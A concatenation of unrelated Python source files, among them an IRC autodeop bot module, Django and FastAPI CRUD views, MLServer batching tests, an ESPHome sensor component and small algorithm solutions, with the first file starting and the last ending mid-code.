file_name = "_".join([self.fasta_dir + '%s/' % prot_id, 'swap', data[-1], 'Pos', str(data[-2]), 'ID', str(data[-3]).replace('_', '-'),
'Allele', str(data[-4]), 'nmer', str(data[-5])])
with open(file_name + '.fasta', 'w') as inf:
for swap in swaps:
inf.write("".join(['>', prot_id, '_', swap, '\n']))
inf.write(swap + '\n')
return file_name + '.fasta'
def _create_swaps(self, peptide):
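# Generate every single-position variant of the peptide: each residue is replaced in turn by each of the 20 standard amino acids (the original residue included), giving len(peptide) * 20 candidate swaps.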
list_peps = []
for i in range(len(peptide)):
for k in range(len(self.list_AA)):
list_peps.append(self._insert_aa(peptide, i, self.list_AA[k]))
return list_peps
def _slice_df(self, nmer, allele, prot_id):
return self.df.loc[(self.df['n-mer'] == nmer) & (self.df['Allele'] == allele) & (self.df['ID'] == prot_id)]
@staticmethod
def _insert_aa(string, index, aa):
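# Despite the name, this substitutes the character at `index` with `aa` rather than inserting an extra one.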
hash_string = list(string)
del hash_string[index]
hash_string.insert(index, aa)
return "".join(hash_string)
def _get_prot_ids(self, proteins):
if proteins == 'All':
return list(self.df['ID'].unique())
if isinstance(proteins, list):
return self.check_existence(proteins)
def check_existence(self, proteins):
for protein in proteins:
if protein not in self.df.ID.unique():
raise ValueError('Input protein %s not found in csv files' % protein)
return proteins
@staticmethod
def _get_nmers(pepdata):
return pepdata['n-mer'].unique()
@staticmethod
def _get_alleles(pepdata):
return pepdata['Allele'].unique()
@staticmethod
def check_size(sliced):
if len(sliced) == 0:
return False
else:
return True
|
|
modules/autodeop/autodeop.py
|
|
|
|
# -*- coding: utf-8 -*-
from pycobot.pycobot import BaseModel
from peewee.peewee import CharField
from irc import client
class autodeop:
def __init__(self, core, client):
core.addCommandHandler("autodeop", self, cpriv=6, cprivchan=True, chelp=
"Activa o desactiva el autodeop en un canal. Sintaxis: autodeop <canal>"
" <on/off>")
try:
autodeopt.create_table(True)
except:
pass
core.addHandler("mode", self, "modeprot")
def autodeop_p(self, bot, cli, event):
if len(event.splitd) > 0:
return event.splitd[0]
return 1
def autodeop(self, bot, cli, ev):
if len(ev.splitd) < 2:
cli.msg(ev.target, "\00304Error\003: Faltan parametros.")
return 1
ch = autodeopt.select().where(autodeopt.channel == ev.splitd[0])
if ev.splitd[1] == "on":
if ch.count() == 0:
autodeopt.create(channel=ev.splitd[0])
cli.msg(ev.target, "Se ha activado el autodeop en \2" +
ev.splitd[0])
else:
cli.msg(ev.target, "\00304Error\003: El autodeop ya esta a"
"ctivado en el canal \2" + ev.splitd[0])
else:
if ch.count() != 0:
r = autodeopt.get(autodeopt.channel == ev.splitd[0])
r.delete_instance()
cli.msg(ev.target, "Se ha desactivado el autodeop en \2" +
ev.splitd[0])
else:
cli.msg(ev.target, "\00304Error\003: El autodeop no esta a"
"ctivado en el canal \2" + ev.splitd[0])
def modeprot(self, cli, ev):
try:
c = autodeopt.get(autodeopt.channel == ev.target)
except autodeopt.DoesNotExist:
return 1
if client.parse_nick(ev.source)[1] == cli.nickname:
return 1
x = self.parsemode(cli, ev)
for w in x:
if w == cli.nickname:
continue
cli.mode(ev.target, "-o " + w)
def parsemode(self, cli, ev):
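# Walk the IRC mode string, tracking the current +/- state and the parameters consumed by parameterised modes, and collect the nicks that are being granted +o.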
res = []
cmodelist = cli.features.chanmodes
param = cmodelist[0] + cmodelist[1] + cmodelist[2]
for i, val in enumerate(cli.features.prefix):
param = param + cli.features.prefix[val]
pos = 0
for c in ev.arguments[0]:
if c == "-":
rving = False
pass
elif c == "+":
rving = True
else:
if c in param:
pos = pos + 1
if rving is False:
continue
if c == "o":
res.append(ev.arguments[pos]) # BEEP BEEP BEEP BEEP
return res
class autodeopt(BaseModel):
channel = CharField(primary_key=True)
class Meta:
db_table = "autodeop"
|
|
esphomeyaml/components/sensor/bmp085.py
|
johnerikhalse/esphomeyaml
|
|
|
import voluptuous as vol
import esphomeyaml.config_validation as cv
from esphomeyaml.components import sensor
from esphomeyaml.const import CONF_ADDRESS, CONF_MAKE_ID, CONF_NAME, CONF_PRESSURE, \
CONF_TEMPERATURE, CONF_UPDATE_INTERVAL
from esphomeyaml.helpers import App, Application, HexIntLiteral, add, variable
DEPENDENCIES = ['i2c']
MakeBMP085Sensor = Application.MakeBMP085Sensor
PLATFORM_SCHEMA = sensor.PLATFORM_SCHEMA.extend({
cv.GenerateID(CONF_MAKE_ID): cv.declare_variable_id(MakeBMP085Sensor),
vol.Required(CONF_TEMPERATURE): cv.nameable(sensor.SENSOR_SCHEMA),
vol.Required(CONF_PRESSURE): cv.nameable(sensor.SENSOR_SCHEMA),
vol.Optional(CONF_ADDRESS): cv.i2c_address,
vol.Optional(CONF_UPDATE_INTERVAL): cv.update_interval,
})
def to_code(config):
rhs = App.make_bmp085_sensor(config[CONF_TEMPERATURE][CONF_NAME],
config[CONF_PRESSURE][CONF_NAME],
config.get(CONF_UPDATE_INTERVAL))
bmp = variable(config[CONF_MAKE_ID], rhs)
if CONF_ADDRESS in config:
add(bmp.Pbmp.set_address(HexIntLiteral(config[CONF_ADDRESS])))
sensor.setup_sensor(bmp.Pbmp.Pget_temperature_sensor(), bmp.Pmqtt_temperature,
config[CONF_TEMPERATURE])
sensor.setup_sensor(bmp.Pbmp.Pget_pressure_sensor(), bmp.Pmqtt_pressure,
config[CONF_PRESSURE])
BUILD_FLAGS = '-DUSE_BMP085_SENSOR'
|
|
Python3/0909-Snakes-and-Ladders/soln-1.py
|
wyaadarsh/LeetCode-Solutions
|
|
|
import collections
from typing import List
class Solution:
def snakesAndLadders(self, board: List[List[int]]) -> int:
# this is a bfs
def num_to_rc(num):
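# Map a 1-based square number to (row, col) indices in the board array: the numbering snakes back and forth (boustrophedon) and square 1 sits in the last row of the array.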
N = len(board)
num -= 1
r, c = divmod(num, N)
if r % 2:
c = N - 1 - c
r = N - 1 - r
return r, c
frontier = collections.deque([1])
seen = {1}
target = len(board) * len(board)
step = 0
while frontier:
sz = len(frontier)
for _ in range(sz):
x = frontier.popleft()
if x == target:
return step
for dx in range(1, 7):
nx = x + dx
if nx <= target:
r, c = num_to_rc(nx)
if board[r][c] != -1:
nx = board[r][c]
if nx not in seen:
seen.add(nx)
frontier.append(nx)
step += 1
return -1
|
|
orchestrate_ai/mirex_lyrics_dataset/trainer.py
|
|
|
|
import computation_graph
""" Trains Lyrics Dataset
Runs training in computation graph
"""
def train_lyrics():
computation_graph.train_lyrics()
|
|
|
JacksonOsvaldo/bc_calcado-vendas
|
|
|
from django.shortcuts import render, resolve_url
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse_lazy
from django.db.models import F, Count
from django.views.generic import TemplateView, ListView, DetailView
from django.views.generic.edit import UpdateView
from django.forms.models import inlineformset_factory
from .models import Customer, Seller, Brand, Product, Sale, SaleDetail
from .forms import SaleForm, SaleDetailForm
from .mixins import CounterMixin, FirstnameSearchMixin
home = TemplateView.as_view(template_name='index.html')
about = TemplateView.as_view(template_name='about.html')
class CustomerList(CounterMixin, FirstnameSearchMixin, ListView):
template_name = 'core/person/customer_list.html'
model = Customer
paginate_by = 8
class CustomerDetail(DetailView):
template_name = 'core/person/customer_detail.html'
model = Customer
class CustomerUpdate(UpdateView):
template_name = 'core/person/customer_edit.html'
model = Customer
success_url = reverse_lazy('customer_detail')
class SellerList(CounterMixin, FirstnameSearchMixin, ListView):
template_name = 'core/person/seller_list.html'
model = Seller
paginate_by = 8
class SellerDetail(DetailView):
template_name = 'core/person/seller_detail.html'
model = Seller
class BrandList(CounterMixin, ListView):
template_name = 'core/product/brand_list.html'
model = Brand
class ProductList(CounterMixin, ListView):
template_name = 'core/product/product_list.html'
model = Product
paginate_by = 100
def get_queryset(self):
p = Product.objects.all()
q = self.request.GET.get('search_box')
# search by product
if q is not None:
p = p.filter(product__icontains=q)
# filter products with low stock
if self.request.GET.get('filter_link', False):
p = p.filter(stock__lt=F('stock_min'))
# filter discontinued products
if self.request.GET.get('outofline', False):
p = p.filter(outofline=1)
return p
def sale_create(request):
order_forms = Sale()
item_order_formset = inlineformset_factory(
Sale, SaleDetail, form=SaleDetailForm, extra=0, can_delete=False,
min_num=1, validate_min=True)
if request.method == 'POST':
forms = SaleForm(request.POST, request.FILES,
instance=order_forms, prefix='main')
formset = item_order_formset(
request.POST, request.FILES, instance=order_forms, prefix='product')
if forms.is_valid() and formset.is_valid():
forms = forms.save()
formset.save()
return HttpResponseRedirect(resolve_url('core:sale_detail', forms.pk))
else:
forms = SaleForm(instance=order_forms, prefix='main')
formset = item_order_formset(instance=order_forms, prefix='product')
context = {
'forms': forms,
'formset': formset,
}
return render(request, 'core/sale/sale_form.html', context)
class SaleList(CounterMixin, ListView):
template_name = 'core/sale/sale_list.html'
model = Sale
paginate_by = 20
def get_queryset(self):
# filter sales with a single item
if 'filter_sale_one' in self.request.GET:
return Sale.objects.annotate(
itens=Count('sales_det')).filter(itens=1)
# filter sales with zero items
if 'filter_sale_zero' in self.request.GET:
return Sale.objects.annotate(
itens=Count('sales_det')).filter(itens=0)
# filters on the queryset
qs = super(SaleList, self).get_queryset()
# clicking a customer returns that customer's sales
if 'customer' in self.request.GET:
qs = qs.filter(customer=self.request.GET['customer'])
# clicking a seller returns that seller's sales
if 'seller' in self.request.GET:
qs = qs.filter(seller=self.request.GET['seller'])
return qs
class SaleDetailView(DetailView):
template_name = 'core/sale/sale_detail.html'
model = Sale
context_object_name = 'Sale'
def get_context_data(self, **kwargs):
sd = SaleDetail.objects.filter(sale=self.object)
context = super(SaleDetailView, self).get_context_data(**kwargs)
context['count'] = sd.count()
context['Itens'] = sd
return context
|
|
tests/batching/test_adaptive.py
|
alexander-manley/MLServer
|
|
|
import asyncio
import pytest
from typing import List
from mlserver.batching.adaptive import AdaptiveBatcher
from mlserver.batching.shape import Shape
from mlserver.types import InferenceRequest, RequestInput
from mlserver.model import MLModel
from mlserver.utils import generate_uuid
from .conftest import TestRequestSender
async def test_batch_requests(
adaptive_batcher: AdaptiveBatcher,
send_request: TestRequestSender,
):
max_batch_size = adaptive_batcher._max_batch_size
sent_requests = dict(
await asyncio.gather(*[send_request() for _ in range(max_batch_size)])
)
batched_requests = [
batched_req async for batched_req in adaptive_batcher._batch_requests()
]
assert len(batched_requests) == 1
assert batched_requests[0].inference_requests == sent_requests
async def test_batch_requests_timeout(
adaptive_batcher: AdaptiveBatcher,
send_request: TestRequestSender,
):
"""
Test that when fewer requests than the max batch size arrive, the timeout
is hit and the partial batch still gets processed.
"""
for _ in range(2):
sent_request = dict([await send_request()])
batched_requests = [
batched_req async for batched_req in adaptive_batcher._batch_requests()
]
assert len(batched_requests) == 1
assert batched_requests[0].inference_requests == sent_request
async def test_batcher(
adaptive_batcher: AdaptiveBatcher,
send_request: TestRequestSender,
sum_model: MLModel,
):
max_batch_size = adaptive_batcher._max_batch_size
sent_requests = dict(
await asyncio.gather(*[send_request() for _ in range(max_batch_size)])
)
await adaptive_batcher._batcher()
assert sent_requests.keys() == adaptive_batcher._async_responses.keys()
for internal_id, sent_request in sent_requests.items():
async_response = adaptive_batcher._async_responses[internal_id]
response = await async_response
assert sent_request.id == response.id
expected = await sum_model.predict(sent_request)
assert expected == response
async def test_batcher_propagates_errors(
adaptive_batcher: AdaptiveBatcher,
send_request: TestRequestSender,
mocker,
):
message = "This is an error"
async def _async_exception():
raise Exception(message)
max_batch_size = adaptive_batcher._max_batch_size
sent_requests = dict(
await asyncio.gather(*[send_request() for _ in range(max_batch_size)])
)
adaptive_batcher._predict_fn = mocker.stub("_predict_fn")
adaptive_batcher._predict_fn.return_value = _async_exception()
await adaptive_batcher._batcher()
for internal_id, _ in sent_requests.items():
with pytest.raises(Exception) as err:
await adaptive_batcher._async_responses[internal_id]
assert str(err.value) == message
async def test_batcher_cancels_responses(
adaptive_batcher: AdaptiveBatcher,
mocker,
):
message = "This is an error"
async def _async_exception():
raise Exception(message)
num_requests = adaptive_batcher._max_batch_size * 2 + 2
adaptive_batcher._batcher = mocker.stub("_batcher")
adaptive_batcher._batcher.side_effect = iter(_async_exception, None)
requests = [
InferenceRequest(
id=generate_uuid(),
inputs=[
RequestInput(
name="input-0",
shape=[1, 3],
datatype="INT32",
data=[idx, idx + 1, idx + 2],
)
],
)
for idx in range(num_requests)
]
responses = await asyncio.gather(
*[adaptive_batcher.predict(request) for request in requests],
return_exceptions=True,
)
for response in responses:
assert isinstance(response, Exception)
assert str(response) == message
@pytest.mark.parametrize(
"requests",
[
[
InferenceRequest(
id=f"request-{idx}",
inputs=[
RequestInput(
name="input-0",
shape=[1, 3],
datatype="INT32",
data=[idx, idx + 1, idx + 2],
)
],
)
# 10 is the max_batch_size for sum_model
# Make sure one batch is only half-full
for idx in range(10 * 2 + 2)
],
[
InferenceRequest(
id="large-request",
inputs=[
# 10 is the max batch size, so we send a minibatch with
# 20 entries
RequestInput(
name="input-0",
shape=[10 * 2, 3],
datatype="INT32",
data=[n for n in range(10 * 2 * 3)],
)
],
),
InferenceRequest(
id="regular-request",
inputs=[
RequestInput(
name="input-0",
shape=[1, 3],
datatype="INT32",
data=[1000, 1001, 1002],
)
],
),
],
],
)
async def test_predict(
requests: List[InferenceRequest],
adaptive_batcher: AdaptiveBatcher,
sum_model: MLModel,
):
responses = await asyncio.gather(
*[adaptive_batcher.predict(request) for request in requests]
)
assert len(requests) == len(responses)
for req, res in zip(requests, responses):
assert req.id == res.id
req_shape = Shape(req.inputs[0].shape)
res_shape = Shape(res.outputs[0].shape)
assert req_shape.batch_size == res_shape.batch_size
expected = await sum_model.predict(req)
assert res == expected
|
|
vue_uikit/vues/tools/errorCode.py
|
|
|
|
"""
errorCode
"""
#
userDoesNotExits = 1001 # user does not exist
userHasBeenExits = 1002 # user already exists
userOrPasswordError = 1003 # incorrect username or password
serverBusy = 1004 # server busy
|
|
|
|
|
|
import os
from flask import Flask, send_from_directory
from flask_cors import CORS
from aor_parser import \
AORTechParser, AORCardParser, \
AORStringsParser, HomecityParser
app = Flask(__name__, static_url_path='')
cors = CORS(app)
current_path = os.getcwd()
tech_parser = AORTechParser(
current_path + '\\data\\Data\\techtreey.xml')
strings_parser = AORStringsParser(
current_path + '\\data\\Data\\strings')
homecity_parser = HomecityParser(current_path + '\\data\\Data', current_path + '\\data\\Data\\civs.xml')
parser = AORCardParser(
current_path + '\\data\\Data',
tech_parser,
strings_parser,
homecity_parser
)
@app.route(
'/api/get_cards',
methods=['GET'])
def index():
return parser.cards
@app.route('/img/<path:path>')
def send_js(path):
return send_from_directory('data/pictures/Data/wpfg', path)
if __name__ == '__main__':
app.debug = True
app.run(host='0.0.0.0', port=5005)
|
|
src/deprecated/test_rl.py
|
|
|
|
import torch
import torch.optim as optim
from itertools import count
import argparse
from os.path import join
from agent import NSQ
from policy import PolicyNet
from game import VFGGAME
from explorer import Explorer
from util import logger
from train_new import MACHINE_LABEL_DIR_HOLDOUT, CLASSIFIER_ROOT_HOLDOUT
from train_new import test_all
from deprecated.lsun import test_lsun_model_holdout, train_lsun_model_holdout
def parse_arguments():
parser = argparse.ArgumentParser(description="training N-step Q learning")
parser.add_argument('--category', type=str, default='cat',
help='image category')
parser.add_argument('--budget', type=int, default=10000,
help='maximum number of examples for human annotation')
parser.add_argument('--eps-start', type=float, default=0.9,
help='starting epsilon')
parser.add_argument('--eps-end', type=float, default=0.05,
help='ending epsilon')
parser.add_argument('--decay-steps', type=int, default=100000,
help='decay steps')
parser.add_argument('--gamma', type=float, default=0.999,
help='discount factor')
parser.add_argument('--duration', '-N', type=int, default=100,
help='get reward every N steps')
parser.add_argument('--batch-size', type=int, default=128,
help='batch size')
parser.add_argument('--target-update', '-T', type=int, default=1000,
help='update target network every T steps')
parser.add_argument('--learning-start', type=int, default=50000)
parser.add_argument('--buffer-size', type=int, default=100000)
parser.add_argument('--num-actions', type=int, default=2,
help='default action is `keep` or `drop`')
parser.add_argument('--input_dim', type=int, default=2048,
help='feature size')
parser.add_argument('--save-every', type=int, default=1,
help='save the checkpoint every K episodes')
parser.add_argument('--episodes', type=int, default=10,
help='number of test episodes to run')  # assumed default; args.episodes is used in test_nsq below
parser.add_argument('--val_rate', type=float, default=0.2)
parser.add_argument('--test_rate', type=float, default=0.2)
# flags for the game
parser.add_argument('--eval-dir', type=str, default='',
help='path to the training list folder')
parser.add_argument('--train-prefix', type=str, default='train',
help='prefix of the training files')
parser.add_argument('--key-path', type=str,
help='key path for the unknown data set')
parser.add_argument('--work-dir', type=str, default='', help = 'work dir')
parser.add_argument('--pretrained', type=str, default='', help='path to pretrained NSQ policy')
args = parser.parse_args()
global work_dir
work_dir = args.work_dir
return args
def test_nsq(args, game, q_func):
device = 'cuda' if torch.cuda.is_available() else 'cpu'
input_dim = args.input_dim
num_actions = args.num_actions
Q = q_func(input_dim, num_actions).to(device)
target_Q = q_func(input_dim, num_actions).to(device)
optimizer = optim.RMSprop(Q.parameters())
expr = Explorer(args.eps_start, args.eps_end, decay_steps=args.decay_steps)
robot = NSQ(Q, target_Q, optimizer, expr,
gamma=args.gamma, num_actions=num_actions)
episode_durations = []
# Pipeline params
category = args.category
# Set initial unsure key path
new_key_path = join(MACHINE_LABEL_DIR_HOLDOUT, '{}_trial_{}_unsure.p'.format(category, 0))
# Test on RL agent
logger.info('Testing on RL agent')
for i_episode in range(1, args.episodes + 1):
game.reset(new_key_path)
# pipeline param
trial = i_episode
robot.q_function.reset_hidden(args.batch_size)
robot.target_q_function.reset_hidden(args.batch_size)
# sample the initial feature from the environment
# since our policy network takes the hidden state and the current
# feature as input. The hidden state is passed implicitly
state = game.sample()
for t in count():
action, qvalue = robot.act(state)
reward, next_state, done = game.step(action)
if action > 0 and (game.chosen % game.duration == 0
or game.chosen == game.budget):
# Train the classifier
game.train_model('latest_RL', CLASSIFIER_ROOT_HOLDOUT)
# select threshold
game.test_model('latest_RL', CLASSIFIER_ROOT_HOLDOUT)
state = next_state
if done:
episode_durations.append(t + 1)
# propagate through the whole dataset and split
test_all_data_holdout(category, i_episode, "RL")
new_key_path = join(MACHINE_LABEL_DIR_HOLDOUT, 'RL', '{}_trial_{}_unsure.p'.format(category, trial))
break
# Test on LSUN
logger.info("Testing on LSUN")
for i_episode in range(1, args.episodes + 1):
trial = i_episode
new_key_path = join(MACHINE_LABEL_DIR_HOLDOUT, 'latest_LSUN',
'{}_trial_{}_unsure.p'.format('cat', trial - 1))
train_lsun_model_holdout(game, "latest_LSUN", CLASSIFIER_ROOT_HOLDOUT, new_key_path)
test_lsun_model_holdout("latest_LSUN", CLASSIFIER_ROOT_HOLDOUT)
test_all_data_holdout(category, i_episode, "LSUN")
def test_all_data_holdout(category, i_episode, mode):
"""
test to split the dataset
:return:
"""
trial = i_episode
model_file_dir = join(CLASSIFIER_ROOT_HOLDOUT, 'latest_{}'.format(mode), 'snapshots')
last_trial_key_path = join(MACHINE_LABEL_DIR_HOLDOUT, mode,
'{}_trial_{}_unsure.p'.format(category, trial - 1))
test_all(last_trial_key_path, trial, 'resnet', 'cat', model_file_dir)
def main():
args = parse_arguments()
game = VFGGAME(args)
q_func = PolicyNet
test_nsq(args, game, q_func)
if __name__ == '__main__':
main()
|
|
Task03/FindWordOccurence.py
|
|
|
|
import re
text = [
"Hello, World!",
"The world is mine",
"Hello, how are you?"
]
def get_words(text):
words = []
for sentence in text:
words_in_sentence = re.findall(r'\w+', sentence.lower())
for item in words_in_sentence:
words.append(item)
return words
def get_words_dict(words):
words_dict = dict()
for word in words:
if word in words_dict:
words_dict[word] = words_dict[word] + 1
else:
words_dict[word] = 1
return words_dict
def get_index_text(word):
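# Return the index of the first sentence in `text` that contains the given word.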
for sentence in text:
sentence_words = re.split(r'\W+', sentence.lower())
if word in sentence_words:
return text.index(sentence)
def main():
words = get_words(text)
words_dict = get_words_dict(words)
print(f"{'word':10}{'count':<10}{'occurrence':>10}")
for word in words_dict:
index_occerence = get_index_text(word)
print(f"{word:<10}{words_dict[word]:<10}{index_occerence:<10}")
main()
|
|
src/iam_sarif_report/bootstrap.py
|
georgealton/iam-policy-validator-to-sarif
|
|
|
from __future__ import annotations
import punq
from .adapters import checks, reader, reporter, validator
from .domain import converter
from .service_layer import bus, handlers
def bootstrap() -> bus.Bus:
container = punq.Container()
container.register("Reader", reader.LocalFileReader)
container.register("ChecksRepository", checks.ChecksPackageDataRepository)
container.register("Reporter", reporter.CLIReporter)
container.register("Converter", converter.SarifConverter)
container.register("Validator", validator.AWSAccessAnalyzerValidator)
return bus.Bus(
command_handlers={
Command: container.instantiate(Handler)
for Command, Handler in handlers.Handler.registry.items()
}
)
|
|
|
|
|
|
#!/usr/bin/env python3
"""
Crack the XMAS encoding.
https://adventofcode.com/2020/day/9
"""
import argparse
def fetch_preamble(file, n):
"""
Given a file, read the first n numbers. Sort the list for faster search.
Return both the original list and the sorted list as a tuple.
"""
numbers = []
while len(numbers) < n:
numbers.append(fetch_next(file))
return (numbers, sorted(numbers))
def fetch_next(file):
return int(file.readline())
def update(ls, new_number):
"""
Given a tuple of original list and sorted list, add the new number to the
lists and drop the oldest number. Return the updated tuple. (they are also
updated by reference).
"""
(numbers, sorted_numbers) = ls
drop = numbers[0]
numbers = numbers[1:] + [new_number]
sorted_numbers.remove(drop) # ok for there to be duplicates b/c we just remove the first one!
sorted_numbers.append(new_number)
sorted_numbers.sort() # would be more efficient to iterate once and insert/remove but who cares
return (numbers, sorted_numbers)
def is_valid(ls, number):
"""
Given a tuple of original list and sorted list, determine whether the next
number is valid (ie, is a sum of some pair in the list)
"""
(numbers, sorted_numbers) = ls
for i in range(len(sorted_numbers) - 1, 0, -1):
if sorted_numbers[i] > number:
continue
for j in range(0, i):
if sorted_numbers[i] + sorted_numbers[j] == number:
return True
return False
def find_range(file, target):
"""
Given a file, read numbers to find a contiguous list of numbers that sums to
the given target number. Return the list.
"""
numbers = []
candidate = sum(numbers)
while candidate != target:
if candidate > target:
numbers.pop(0)
else:
numbers.append(fetch_next(file))
candidate = sum(numbers)
return numbers
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('filename', help='Path to the file containing XMAS data')
parser.add_argument('--tail-len', type=int, default=25, help='Length of preamble/previous N numbers to consider')
args = parser.parse_args()
with open(args.filename, 'r') as f:
tail = fetch_preamble(f, args.tail_len)
number = fetch_next(f)
while(is_valid(tail, number)):
tail = update(tail, number)
number = fetch_next(f)
target_number = number
print('Invalid number (target):', target_number)
f.seek(0)
contig = find_range(f, target_number)
print('Found range that sums to target number:', contig)
xmas = min(contig) + max(contig)
print('XMAS value:', xmas)
|
|
algorithm/about_merge_sort.py
|
dictxwang/python-fragments
|
|
|
# -*- coding: utf8 -*-
__author__ = 'wangqiang'
'''
Merge sort: worst-case time complexity n*lg(n), using a divide-and-conquer strategy
'''
def merge_sort(lst):
if len(lst) <= 1:
return lst
middle = len(lst) // 2
# recursively sort the left and right halves
left = merge_sort(lst[:middle])
right = merge_sort(lst[middle:])
# merge the two sorted sub-sequences
i = 0
j = 0
k = 0
result = [0] * len(lst)
while i < len(left) and j < len(right):
if left[i] <= right[j]:
result[k] = left[i]
i += 1
else:
result[k] = right[j]
j += 1
k += 1
# append any elements remaining in either sub-sequence to the result
while i < len(left):
result[k] = left[i]
k += 1
i += 1
while j < len(right):
result[k] = right[j]
k += 1
j += 1
return result
if __name__ == '__main__':
lst = [23, 1, 4, 5, -10, 56, 190, 230, 20, 30, 40, 50]
lst = merge_sort(lst)
print(lst)
|
|
sector/migrations/0004_auto_20180305_1429.py
|
|
|
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.10 on 2018-03-05 14:29
from __future__ import unicode_literals
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
import wagtailmarkdown.blocks
class Migration(migrations.Migration):
dependencies = [
('sector', '0003_sectorpage_show_on_frontpage'),
]
operations = [
migrations.AlterField(
model_name='sectorpage',
name='pullout',
field=wagtail.core.fields.StreamField((('content', wagtail.core.blocks.StructBlock((('text', wagtailmarkdown.blocks.MarkdownBlock()), ('stat', wagtail.core.blocks.CharBlock()), ('stat_text', wagtail.core.blocks.CharBlock())), max_num=1, min_num=0)),), blank=True),
),
]
|
|
ui/maintenance_protocols/configure_make_install.py
|
|
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 29/12/2017 10:05 AM
# @Project : main
# @Author : <NAME>
# @File : configure_make_install.py
def get_sub_protocol(db_obj, protocol_parent, step_order_start=1):
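# Build the three standard steps (./configure --prefix, make, make install) for the given protocol parent and return the next free step order together with the created step objects.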
steps = list()
steps.append(db_obj(software='./configure',
parameter='--prefix {{UserBin}}',
parent=protocol_parent,
user_id=0,
hash='dfca5277f71c6782e3351f6ed9ac7fcb',
step_order=step_order_start))
steps.append(db_obj(software='make',
parameter='',
parent=protocol_parent,
user_id=0,
hash='099dafc678df7d266c25f95ccf6cde22',
step_order=step_order_start+1))
steps.append(db_obj(software='make',
parameter='install',
parent=protocol_parent,
user_id=0,
hash='12b64827119f4815ca8d43608d228f36',
step_order=step_order_start+2))
return step_order_start+len(steps), steps
|
|
src/api_segura/app/app.py
|
|
|
|
from typing import List
from fastapi import FastAPI, Depends
from fastapi.exceptions import HTTPException
from sqlalchemy.orm import Session
from app import crud
from app import models
from app import schemas
from app.db import create_db_and_tables, get_db
from app.users import auth_backend, current_active_user, fastapi_users
app = FastAPI()
@app.get("/api/", response_model=List[schemas.SchemaAlumno])
def vuelca_base(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):
alumnos = crud.consulta_alumnos(db, skip=skip, limit=limit)
return alumnos
@app.get("/api/{cuenta}", response_model=schemas.SchemaAlumno)
def get_alumno(cuenta, db: Session = Depends(get_db)):
alumno = crud.consulta_alumno(db=db, cuenta=cuenta)
if alumno:
return alumno
else:
raise HTTPException(status_code=404, detail="Recurso no encontrado")
@app.delete("/api/{cuenta}")
async def delete_alumno(cuenta, user: models.UserDB = Depends(current_active_user), db: Session = Depends(get_db)):
alumno = crud.consulta_alumno(db=db, cuenta=cuenta)
if alumno:
crud.baja_alumno(db=db, alumno=alumno)
return {}
else:
raise HTTPException(status_code=404, detail="Recurso no encontrado")
@app.post("/api/{cuenta}", response_model=schemas.SchemaAlumno)
def post_alumno(cuenta, candidato: schemas.SchemaAlumnoIn, db: Session = Depends(get_db)):
alumno = crud.consulta_alumno(db=db, cuenta=cuenta)
if alumno:
raise HTTPException(status_code=409, detail="Recurso existente")
return crud.alta_alumno(db=db, cuenta=cuenta, candidato=candidato)
@app.put("/api/{cuenta}", response_model=schemas.SchemaAlumno)
def put_alumno(cuenta, candidato: schemas.SchemaAlumnoIn, db: Session = Depends(get_db)):
alumno = crud.consulta_alumno(db=db, cuenta=cuenta)
if alumno:
crud.baja_alumno(db=db, alumno=alumno)
return crud.alta_alumno(db=db, cuenta=cuenta, candidato=candidato)
else:
raise HTTPException(status_code=404, detail="Recurso no encontrado")
AUTH_PATH ='/auth'
app.include_router(fastapi_users.get_auth_router(auth_backend),
prefix=f"{AUTH_PATH}/jwt",
tags=["auth"])
app.include_router(fastapi_users.get_register_router(),
prefix=f"{AUTH_PATH}",
tags=["auth"])
app.include_router(fastapi_users.get_reset_password_router(),
prefix=f"{AUTH_PATH}",
tags=["auth"],)
app.include_router(fastapi_users.get_verify_router(),
prefix=f"{AUTH_PATH}",
tags=["auth"],)
app.include_router(fastapi_users.get_users_router(),
prefix="/users",
tags=["users"])
@app.on_event("startup")
async def on_startup():
# Not needed if you setup a migration system like Alembic
await create_db_and_tables()
|
|
|
|
|
|
# -*- coding: utf-8 -*-
from os.path import realpath, dirname, join
from re import compile
from sqlite3 import connect
class SafeBase:
def __init__(self, g, database_filename):
self.g = g
posizione = dirname(realpath(__file__))
self.percorso = join(posizione, database_filename)
self.init_db()
def init_db(self):
database = connect(self.percorso)
cursore = database.cursor()
cursore.execute('''
CREATE TABLE IF NOT EXISTS utente (
username TEXT PRIMARY KEY,
password TEXT NOT NULL,
chiave TEXT NOT NULL,
sale TEXT NOT NULL
)
''')
database.commit()
cursore.execute('''
CREATE TABLE IF NOT EXISTS profilo (
username TEXT PRIMARY KEY,
nome TEXT,
cognome TEXT,
stato TEXT,
foto TEXT
)
''')
database.commit()
cursore.execute('''
CREATE TABLE IF NOT EXISTS messaggio (
chiave INTEGER PRIMARY KEY AUTOINCREMENT,
proprietario TEXT NOT NULL,
partecipante TEXT NOT NULL,
mittente TEXT NOT NULL,
immagine INT DEFAULT 0,
testo TEXT NOT NULL,
data_ora DATETIME DEFAULT CURRENT_TIMESTAMP,
letto INT DEFAULT 0
)
''')
database.commit()
cursore.execute('''
CREATE VIEW IF NOT EXISTS ultimo_messaggio AS
SELECT m.proprietario, m.mittente, m.partecipante, m.testo, m.immagine, m.data_ora, m.letto
FROM messaggio m
INNER JOIN (
SELECT proprietario, partecipante, MAX(data_ora) AS data_ora
FROM messaggio
GROUP BY proprietario, partecipante
) u
ON u.proprietario = m.proprietario
AND u.partecipante = m.partecipante
AND u.data_ora = m.data_ora
''')
database.commit()
cursore.execute('''
CREATE VIEW IF NOT EXISTS non_letti AS
SELECT proprietario, partecipante,
SUM(CASE letto WHEN 0 THEN 1 ELSE 0 END) AS non_letti
FROM messaggio
GROUP BY proprietario, partecipante
''')
database.commit()
cursore.close()
database.close()
def apri_connessione(self):
self.g.db = connect(self.percorso)
self.g.db.text_factory = str
self.g.db.create_function('REGEXP', 2, self.regexp)
def chiudi_connessione(self):
db = getattr(self.g, 'db', None)
if db is not None:
db.close()
def regexp(self, espressione, oggetto):
reg = compile(espressione)
return reg.search(oggetto) is not None
def leggi_righe(self, query, parametri):
cursore = self.g.db.cursor()
cursore.execute(query, parametri)
risultato = cursore.fetchall()
cursore.close()
return risultato
def leggi_riga(self, query, parametri):
cursore = self.g.db.cursor()
